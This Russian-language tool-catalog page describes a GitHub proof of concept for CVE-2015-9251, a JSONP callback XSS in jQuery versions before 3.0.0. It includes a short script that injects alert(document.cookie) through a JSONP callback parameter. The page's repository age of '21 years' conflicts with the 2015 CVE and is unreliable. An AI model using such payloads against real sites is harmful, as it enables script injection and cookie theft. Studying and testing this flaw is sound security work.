Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2015-9251 — CVE-2015-9251 jQuery 低于 3.0.0 的 PoC。 | Kitploit
Инструменты/GitHubGitHub/moften/cve-2015-9251
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubmoften/cve-2015-9251

CVE-2015-9251

CVE-2015-9251 jQuery 低于 3.0.0 的 PoC。

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2015-9251

[email protected]

PoC для CVE-2015-9251 jQuery версий ниже 3.0.0.

CVE-2015-9251 - PoC Exploit

Этот репозиторий содержит Proof of Concept (PoC) для уязвимости CVE-2015-9251 в библиотеке jQuery. Уязвимость позволяет атаку Cross-Site Scripting (XSS) через несанитизированные JSONP-вызовы, так как jQuery позволяет внедрение кода в параметр callback в версиях до 3.0.0.


Описание

CVE-2015-9251 затрагивает версии jQuery до 3.0.0. Уязвимость эксплуатируется путем манипуляции параметром callback в JSONP-запросе, что может позволить выполнение произвольного JavaScript-кода в браузере жертвы. Это может привести к раскрытию конфиденциальных данных, таких как сессионные куки.

Требования

  1. Тестовая среда: Уязвимое веб-приложение должно использовать версию jQuery ниже 3.0.0.
  2. Веб-браузер: Для выполнения PoC и наблюдения за поведением эксплойта.
  • Инструмент инспекции: Инструменты разработчика браузера будут полезны для просмотра результатов.

  • Выполнение PoC

    Для выполнения PoC выполните следующие шаги:

    1. Скопируйте и вставьте код в консоль браузера или включите его в тестовую HTML-страницу.

    Код PoC:

    root@kitploit:~
    <script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
    <script>
      // Función que simula una solicitud a un servidor vulnerable
      $.ajax({
        url: "https://example.com/api?callback=alert(document.cookie)",
        dataType: "jsonp", // JSONP permite la ejecución de código en JSONP callbacks
        success: function(response) {
          console.log(response);
        }
      });
    </script>
    
    Скачать инструмент